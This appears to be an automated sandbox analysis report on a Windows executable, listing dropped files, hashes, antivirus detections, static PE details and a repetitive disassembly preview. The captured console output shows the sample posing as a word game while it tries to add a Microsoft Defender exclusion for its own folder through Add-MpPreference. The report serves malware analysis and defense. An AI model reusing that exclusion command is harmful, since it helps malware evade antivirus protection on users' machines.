                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg2wq42q.z3x.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqil3wa2.s4a.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx55hdj2.oc1.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hprqkrgy.vx4.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i51z1tx3.hhq.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipoksj5s.xzo.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jorhrdbe.jzy.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4axp5zv.0yg.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqewxhb2.xo3.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnrzkanw.2s4.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbdh2p4l.dal.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjhfp4k3.uvq.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuybsjww.poo.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):476160
                                                                                                                                                                                                                        Entropy (8bit):7.302597587896513
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
                                                                                                                                                                                                                        MD5:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                        SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
                                                                                                                                                                                                                        SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
                                                                                                                                                                                                                        SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: Ttok18.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Mg..........................................@...........................(.............................................H.................................(........................................\...........P................................text............................... ....rdata..............................@..@.data...D!".........................@....00cfg........'.....................@..@.reloc.......(.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3622
                                                                                                                                                                                                                        Entropy (8bit):5.159787377196509
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:3Zp9OMdzvXpwwyJDbcwMhtic5+3OtZ5+3QlticB+3OtZB+3Qqntic0+3OtZ0+3ip:ddzv5wtRcwM8JgY5gqlqvw7
                                                                                                                                                                                                                        MD5:7123653A9955360E570498978834DC21
                                                                                                                                                                                                                        SHA1:10F79C5E7494CCC7C1B52B285B4C6DC2482C7FFC
                                                                                                                                                                                                                        SHA-256:BA674902E6BB0800509B7688301E4C38D54742809DD6809DD8A3616AE68C0B49
                                                                                                                                                                                                                        SHA-512:BB10A617189CE07C57AEDF174F734B6FD3F36DF9B0D72112D03CC989C811155C1CF071B3E3F2524E00277BFB24306158388EF104EBB09093A12C0BE6E6D797D8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:Guess the word from the list:..1. Lion..2. Island..3. Monkey..4. Clan..5. Sun..6. Dog..7. Fish..8. Giraffe..9. Queen..10. Elephant..11. Ocean..12. Kite..13. Apple..14. Car..15. Nest..16. River..17. Tree..18. Penguin..19. Banana..20. Jungle..21. House..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'VmTatwGQo' successfully created on C drive....You won a random image:.... |\ \\\\__ o.. |\_/ o \ o .. |_ (( <==> o.. |/ \__+___/.. | / |....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: fish..Error adding exclusion for C:\VmTatwGQo: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\VmTatwGQo..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreferenc

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):0.013532866334979686
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        File name:YYjRtxS70h.exe
                                                                                                                                                                                                                        File size:13'793'970 bytes
                                                                                                                                                                                                                        MD5:5a59ce92b07de68c0be8fbd7944214e2
                                                                                                                                                                                                                        SHA1:b0536d674552c3a11a881b154b668af1b5222641
                                                                                                                                                                                                                        SHA256:e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
                                                                                                                                                                                                                        SHA512:e60be536b168890257e483912e89c5061a49f9781ec118517fc58a633ebf6e14cb6d917dc0c4b002faa07b4d4f2fa3b37d7f21725cf768dca74d397aee22f0bc
                                                                                                                                                                                                                        SSDEEP:384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
                                                                                                                                                                                                                        TLSH:E2D6E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?..........."...0..4...........S... ...`....@.. ....................................`................................

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x4053fa
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
